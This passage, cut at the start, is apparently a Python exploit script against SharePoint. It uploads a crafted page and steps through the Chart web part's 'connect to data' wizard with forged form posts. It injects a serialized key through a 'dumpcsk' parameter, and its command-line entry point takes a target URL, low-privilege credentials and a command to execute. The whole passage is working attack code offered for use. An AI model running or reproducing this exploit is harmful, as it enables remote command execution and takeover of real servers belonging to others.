r.content.decode('latin-1')) if serialized_key == None: return '' serialized_key = serialized_key.group(0) return serialized_key def upload_page(self, site_name, page_name): page = PAGE.replace('SITE_PATH', '/sites/' + site_name).replace('PAGE_NAME', page_name) r = self.s.put(self.site_url + '/SitePages/' + page_name, data=page) return r.status_code in [200, 201] def connect_to_data(self, page_name, key): params = { 'skey': 'g_33333333_3333_3333_3333_333333333333' } headers = { 'Referer': self.site_url + '/SitePages/' + page_name } r = self.s.get(self.site_url + '/_layouts/15/Chart/WebUI/WizardList.aspx', params=params, headers=headers) params = { 'skey': 'g_33333333_3333_3333_3333_333333333333', 'pkey': '187f78c3%2D48e9%2D4099%2D8846%2Ddabee4363a8d', 'csk': '0654a0bd9c554e77ac9b80808e592bc4%5Fe0f22227bb2642bca0fa2d484121abfd' } html = BeautifulSoup(r.content, 'html.parser') href = '' for a in html.find_all('a'): if 'href' in a.attrs: if 'WizardConnectToData.aspx' in a['href']: href = a['href'] break if href == '': return False headers = { 'Referer': r.url } r = self.s.get(self.site_url + '/_layouts/15/Chart/WebUI/' + href, headers=headers) html = BeautifulSoup(r.content, 'html.parser') href = html.find('form')['action'][2:] headers = { 'Referer': r.url } data = { '_maintainWorkspaceScrollPosition': 155, '__EVENTTARGET': 'ctl00$PlaceHolderMain$ctl00$RptControls$buttonNext', '__EVENTARGUMENT': '', 'ctl00_PlaceHolderLeftNavBar_treeNavigation_ExpandState': 'nnnn', 'ctl00_PlaceHolderLeftNavBar_treeNavigation_SelectedNode': 'ctl00_PlaceHolderLeftNavBar_treeNavigationt0', 'ctl00_PlaceHolderLeftNavBar_treeNavigation_PopulateLog': '', '__REQUESTDIGEST': html.find('input', {'name': '__REQUESTDIGEST'})['value'], '__VIEWSTATE': html.find('input', {'name': '__VIEWSTATE'})['value'], '__VIEWSTATEGENERATOR': html.find('input', {'name': '__VIEWSTATEGENERATOR'})['value'], '__SCROLLPOSITIONX': 0, '__SCROLLPOSITIONY': 0, 'ctl00$PlaceHolderMain$step1$DataSource': 'rbtDataSourceWebPart', '__spText1': '', '__spText2': '' } r = self.s.post(self.site_url + '/_layouts/15/Chart/WebUI/' + href, headers=headers, data=data) html = BeautifulSoup(r.content, 'html.parser') headers = { 'Referer': r.url } data = { '_maintainWorkspaceScrollPosition': 108, '__EVENTTARGET': 'ctl00$PlaceHolderMain$ctl00$RptControls$buttonNext', '__EVENTARGUMENT': '', 'ctl00_PlaceHolderLeftNavBar_treeNavigation_ExpandState': 'nnnn', 'ctl00_PlaceHolderLeftNavBar_treeNavigation_SelectedNode': 'ctl00_PlaceHolderLeftNavBar_treeNavigationt1', 'ctl00_PlaceHolderLeftNavBar_treeNavigation_PopulateLog': '', '__REQUESTDIGEST': html.find('input', {'name': '__REQUESTDIGEST'})['value'], '__VIEWSTATE': html.find('input', {'name': '__VIEWSTATE'})['value'], '__VIEWSTATEGENERATOR': html.find('input', {'name': '__VIEWSTATEGENERATOR'})['value'], '__SCROLLPOSITIONX': 0, '__SCROLLPOSITIONY': 0, 'ctl00$PlaceHolderMain$step2$sectionWebPart$ddlDataConnectionWebPart': 'g_33333333_3333_3333_3333_333333333334', '__spText1': '', '__spText2': '' } r = self.s.post(self.site_url + '/_layouts/15/Chart/WebUI/' + href, headers=headers, data=data) html = BeautifulSoup(r.content, 'html.parser') headers = { 'Referer': r.url } params = { 'dumpcsk': key } data = { '_maintainWorkspaceScrollPosition': 65, '__EVENTTARGET': 'ctl00$PlaceHolderMain$ctl00$RptControls$buttonNext', '__EVENTARGUMENT': '', 'ctl00_PlaceHolderLeftNavBar_treeNavigation_ExpandState': 'nnnn', 'ctl00_PlaceHolderLeftNavBar_treeNavigation_SelectedNode': 'ctl00_PlaceHolderLeftNavBar_treeNavigationt2', 'ctl00_PlaceHolderLeftNavBar_treeNavigation_PopulateLog': '', '__REQUESTDIGEST': html.find('input', {'name': '__REQUESTDIGEST'})['value'], '__VIEWSTATE': html.find('input', {'name': '__VIEWSTATE'})['value'], '__VIEWSTATEGENERATOR': html.find('input', {'name': '__VIEWSTATEGENERATOR'})['value'], '__SCROLLPOSITIONX': 0, '__SCROLLPOSITIONY': 0, 'ctl00$PlaceHolderMain$step3$sectionWebPart$ddlWebPartInterfaces': 'TableProvider', '__spText1': '', '__spText2': '' } r = self.s.post(self.site_url + '/_layouts/15/Chart/WebUI/' + href, headers=headers, params=params, data=data) return True if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--url', help='Target URL', required=True) parser.add_argument('--username', help='Username of low privilege user', required=True) parser.add_argument('--password', help='Password of low privilege user', required=True) parser.add_argument('--command', help='Command to execute', required=True) exploit = Exploit(parser.parse_args()) exploit.trigger() ```